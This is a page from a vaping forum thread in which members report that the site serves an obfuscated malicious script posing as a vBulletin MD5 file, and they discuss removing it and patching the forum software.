Page 2 of 2 FirstFirst 12
Results 11 to 13 of 13
Like Tree46Likes

Thread: AVF is infected with Malware

  1. #11
    AVF Regular
    Join Date
    Mar 2013
    Location
    Adelaide
    Posts
    623
    Quote Originally Posted by Dogamondo View Post
    Javascript dev for the past 15 years here.
    Obfuscated JS is basically a process of making it very difficult to be human readable. It started out as a way to reduce the file size (called minification) and then as way to protect intellectual property, and then by attackers as a way to inject malicious javascript into a website for phishing and malware without easily being decoded.
    I've had a look at the file on this site that was picked up by the Sucuri site. I ran it through a deobfuscator to try and figure out what it's doing.
    The file is very heavily obfuscated and injects a connection to an external website via a client-side request.
    From inspecting the web connections made after loading aussievapers.com, it appears the connection is to a site called go.pushnative.com, which is a high risk malware site according to McAfee:
    https://www.mcafee.com/threat-intell...pushnative.com
    I would say this script is definitely malware as its disguised as an MD5 (encryption algorithm) script that sits with all the client side VBulletin script files (the forum software that this site runs).
    All the legit scripts are easily readable and have header information, whereas this script looks like its been placed there deliberately by an attacker (probably a common exploit in the VBulletin software that allowed hackers to put the script there).
    This script isn’t run if you are logged in, it only appears in the client side scripts folder when first visiting the site.
    While typing this the browser on my test machine has crashed twice since visiting the forum home page.
    I’m not sure whether the popups are related to this as they seem to be advertising related. Maybe someone can confirm if Jato is monetising this site using the popup ads? If not then its clear that AussieVapers has been hacked sometime in the last few months.
    The first thing Jato should do is to delete the clientscript/vbulletin_md5.js file as this seems to be the offending file, then update VBulletin and run a scan on the whole aussievapers.com.au domain to make sure there are no other malicious files on the server.
    Update: The popup issue and VBulletin vulnerability confirmed with potential fix here:
    Malicious Pop-ups in vBulletin - Sucuri Research - Website Monitoring, Recovery and Protection
    Wow, looks like you had a little fun writing that one up!
    Fatman, Dogamondo and DocM like this.

  2. #12
    Super Moderator
    Join Date
    Aug 2012
    Location
    Central Vic,up near the Murray
    Posts
    18,763
    Excellent detective work Dogamundo !!!
    I stand corrected
    ( see folks told you I was wrong lol )

    I have emailed your response to Jato for his info ... hopefully it gets sorted

    Cheers folks ... unfortunately us mods are not in the position to do anything about it so fingers crossed !
    EPM V2-18490 (X2 ),GP Spheroid V2.5 and GP Piccolo V2.5 ,BBCB, Provari mini's, REO mini V2.1, 18490 REO , Jazz Carto Pipes ( fitted with GA tank and churchwarden stem Totally Evil!!! ), Meerschaum pipe ,e-holly35W,Phideas, AIOS,Taifun atties, PC Pipe mods.PC Squonker, Svapiamo squonker, GP Paps Heron combo.

    Vaping since 2007 totally smoke free since 2011


    AVF Rules , Read and understand them

  3. #13
    AVF Regular
    Join Date
    Feb 2017
    Location
    Sydney
    Posts
    799
    Hahahah... So happy a JS dude looked into this. And you are right this started happening a few months back. Remembered everyone hammering FM to hassle Jato to fix the issue. hahahahah

    Quote Originally Posted by Dogamondo View Post
    Javascript dev for the past 15 years here.

    Obfuscated JS is basically a process of making it very difficult to be human readable. It started out as a way to reduce the file size (called minification) and then as way to protect intellectual property, and then by attackers as a way to inject malicious javascript into a website for phishing and malware without easily being decoded.

    I've had a look at the file on this site that was picked up by the Sucuri site. I ran it through a deobfuscator to try and figure out what it's doing.

    The file is very heavily obfuscated and injects a connection to an external website via a client-side request.

    From inspecting the web connections made after loading aussievapers.com, it appears the connection is to a site called go.pushnative.com, which is a high risk malware site according to McAfee:

    https://www.mcafee.com/threat-intell...pushnative.com

    I would say this script is definitely malware as its disguised as an MD5 (encryption algorithm) script that sits with all the client side VBulletin script files (the forum software that this site runs).

    All the legit scripts are easily readable and have header information, whereas this script looks like its been placed there deliberately by an attacker (probably a common exploit in the VBulletin software that allowed hackers to put the script there).

    This script isnít run if you are logged in, it only appears in the client side scripts folder when first visiting the site.

    While typing this the browser on my test machine has crashed twice since visiting the forum home page.

    Iím not sure whether the popups are related to this as they seem to be advertising related. Maybe someone can confirm if Jato is monetising this site using the popup ads? If not then its clear that AussieVapers has been hacked sometime in the last few months.

    The first thing Jato should do is to delete the clientscript/vbulletin_md5.js file as this seems to be the offending file, then update VBulletin and run a scan on the whole aussievapers.com.au domain to make sure there are no other malicious files on the server.

    Update: The popup issue and VBulletin vulnerability confirmed with potential fix here:

    Malicious Pop-ups in vBulletin - Sucuri Research - Website Monitoring, Recovery and Protection
    Dogamondo likes this.


 

 
Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Powered by vBulletin® Version 4.2.4
Copyright © 2017 vBulletin Solutions, Inc. All rights reserved.
Search Engine Friendly URLs by vBSEO 3.6.0
All times are GMT +11. The time now is 02:59 PM.